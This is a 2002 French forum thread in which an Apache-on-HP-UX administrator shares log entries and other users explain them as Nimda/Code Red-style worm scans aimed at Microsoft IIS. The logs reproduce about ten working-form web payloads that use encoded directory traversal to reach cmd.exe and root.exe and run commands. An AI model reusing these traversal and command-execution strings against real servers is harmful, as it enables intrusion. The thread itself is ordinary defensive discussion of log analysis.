Un p'tit log Apache interessant .....

Un p'tit log Apache interessant ..... - Windows & Software

Marsh Posté le 15-11-2002 à 16:17:19    

J'ai ouvert mes logs apache, et j'ai vu ces lignes, quelqu'un aurai une bonne idee ?
 
Access log :
 
142.154.103.36 - - [15/Nov/2002:00:20:57 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2143
142.154.103.36 - - [15/Nov/2002:00:21:02 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2143
142.154.103.36 - - [15/Nov/2002:00:21:07 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2143
142.154.103.36 - - [15/Nov/2002:00:21:12 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2143
142.154.103.36 - - [15/Nov/2002:00:21:17 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2143
142.154.103.36 - - [15/Nov/2002:00:21:22 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2143
142.154.103.36 - - [15/Nov/2002:00:21:27 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2143
142.154.103.36 - - [15/Nov/2002:00:21:32 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2143
142.154.103.36 - - [15/Nov/2002:00:21:38 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2143
142.154.103.36 - - [15/Nov/2002:00:21:46 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2143
 
error log :
 
[Fri Nov 15 00:20:57 2002] [error] [client 142.154.103.36] File does not exist: /opt/hpapache2/htdocs/scripts
[Fri Nov 15 00:21:02 2002] [error] [client 142.154.103.36] File does not exist: /opt/hpapache2/htdocs/MSADC
[Fri Nov 15 00:21:07 2002] [error] [client 142.154.103.36] File does not exist: /opt/hpapache2/htdocs/c
[Fri Nov 15 00:21:12 2002] [error] [client 142.154.103.36] File does not exist: /opt/hpapache2/htdocs/d
[Fri Nov 15 00:21:17 2002] [error] [client 142.154.103.36] File does not exist: /opt/hpapache2/htdocs/scripts
[Fri Nov 15 00:21:22 2002] [error] [client 142.154.103.36] File does not exist: /opt/hpapache2/htdocs/_vti_bin
[Fri Nov 15 00:21:27 2002] [error] [client 142.154.103.36] File does not exist: /opt/hpapache2/htdocs/_mem_bin
[Fri Nov 15 00:21:32 2002] [error] [client 142.154.103.36] File does not exist: /opt/hpapache2/htdocs/msadc
[Fri Nov 15 00:21:38 2002] [error] [client 142.154.103.36] File does not exist:  
 
Quelqu'un ma's deja dit virus, mais virus en local ou virus chez le gars qui me balance ces requetes ?
 
@+

Reply

Marsh Posté le 15-11-2002 à 16:17:19   

Reply

Marsh Posté le 15-11-2002 à 16:18:49    

probablement du Nimda chez le gars qui t'envoie ça


---------------
Celui qui pose une question est idiot 5 minutes. Celui qui n'en pose pas le reste toute sa vie. |  Membre du grand complot pharmaceutico-médico-scientifico-judéo-maçonnique.
Reply

Marsh Posté le 15-11-2002 à 16:40:01    

Donc a priori, le pauvre type ne le sait meme pas, que sa becane est infectee...
A part que c'est desagreable, cela ne pourrait pas m'atteindre
Le serveur tourne avec HP-UX, et les droits des repertoires visibles sur le net
sont corrects...

Reply

Marsh Posté le 15-11-2002 à 16:42:05    

de toute façon, nimda est dirigé contre IIS donc forcément Windows
 
que cela ne t'empêche pas d'être à jour sur ton Apache (1.3.27 il me semble pour la dernière version) ;)


---------------
Celui qui pose une question est idiot 5 minutes. Celui qui n'en pose pas le reste toute sa vie. |  Membre du grand complot pharmaceutico-médico-scientifico-judéo-maçonnique.
Reply

Marsh Posté le 15-11-2002 à 16:44:03    

J'suis en 2.0.40, il me semble. en tout cas plus en 1.3  
Unix power .....

Reply

Marsh Posté le 15-11-2002 à 16:53:22    

Mais la question a $20 ( j'suis au quebec, canada....)
Y'a des risques de se chopper un virus avec un bel unix bien configure ?

Reply

Marsh Posté le 15-11-2002 à 16:54:49    

A priori non, enfin pas Nimda en tous les cas :/


---------------
Feedback achat/vente
Reply

Marsh Posté le 15-11-2002 à 17:11:04    

le dernier Apache, c'est le 2.0.43


---------------
Celui qui pose une question est idiot 5 minutes. Celui qui n'en pose pas le reste toute sa vie. |  Membre du grand complot pharmaceutico-médico-scientifico-judéo-maçonnique.
Reply

Marsh Posté le 15-11-2002 à 17:20:34    

c'est le résultat d'un scan de faille unicodes destinée aux serveurs ..... IIS !
t'as pas de soucis  à te faire si tu utilise Apache

Reply

Marsh Posté le 15-11-2002 à 17:21:26    

NeoN_Lights a écrit a écrit :

J'ai ouvert mes logs apache, et j'ai vu ces lignes, quelqu'un aurai une bonne idee ?
 
(...)  
 
Quelqu'un ma's deja dit virus, mais virus en local ou virus chez le gars qui me balance ces requetes ?
 
@+



Pas d'affolement, c'est un virus comme CodeRed qui est fait pour toucher les serveurs WEB tournant sous IIS. Aucun danger pour Apache n'est à craindre ...


---------------
Tant que la couleur de la peau sera plus importante que celle des yeux, nous ne connaitrons pas la paix. ● L'écriture, c'est la mémoire du futur. ● Mods FO4
Reply

Marsh Posté le 15-11-2002 à 17:21:26   

Reply

Marsh Posté le 15-11-2002 à 18:04:18    

Ok, donc je suis a l'abris avec Apache+unix sur les attaques de ce genre. Maintenant, qd j'essaye de resoudre les IP ( car y'a de plusieurs destinations )ce sont des connections cablesou adsl. Le ping repond pas, ni le www. donc les sites distants sont inaccessibles, et on ne peut pas les prevenir...
trop dur la vie en windows.
Merci a tous !


---------------
A tous ceux qui, depart le monde, se sentent etrangers sur leurs propres terres...
Reply

Marsh Posté le 15-11-2002 à 18:06:55    

c du nimda, mes logs IIS en sont plein, c lourd, faudrai prevenir les derniers trainard de mettre leur SP a jour


---------------
Moi quand on m'en fait trop j'correctionne plus, j'dynamite... j'disperse... et j'ventile | feedback
Reply

Marsh Posté le 15-11-2002 à 18:07:50    

NeoN_Lights a écrit a écrit :

Ok, donc je suis a l'abris avec Apache+unix sur les attaques de ce genre. Maintenant, qd j'essaye de resoudre les IP ( car y'a de plusieurs destinations )ce sont des connections cablesou adsl. Le ping repond pas, ni le www. donc les sites distants sont inaccessibles, et on ne peut pas les prevenir...
trop dur la vie en windows.
Merci a tous !




 
qd c naté ... tu peux toujours courir pour trouver l'intrus ... de + les Ip tournent !!!!


---------------
FFFF
Reply

Marsh Posté le 15-11-2002 à 18:08:51    

C bien ce qu'il me semblait !


---------------
A tous ceux qui, depart le monde, se sentent etrangers sur leurs propres terres...
Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed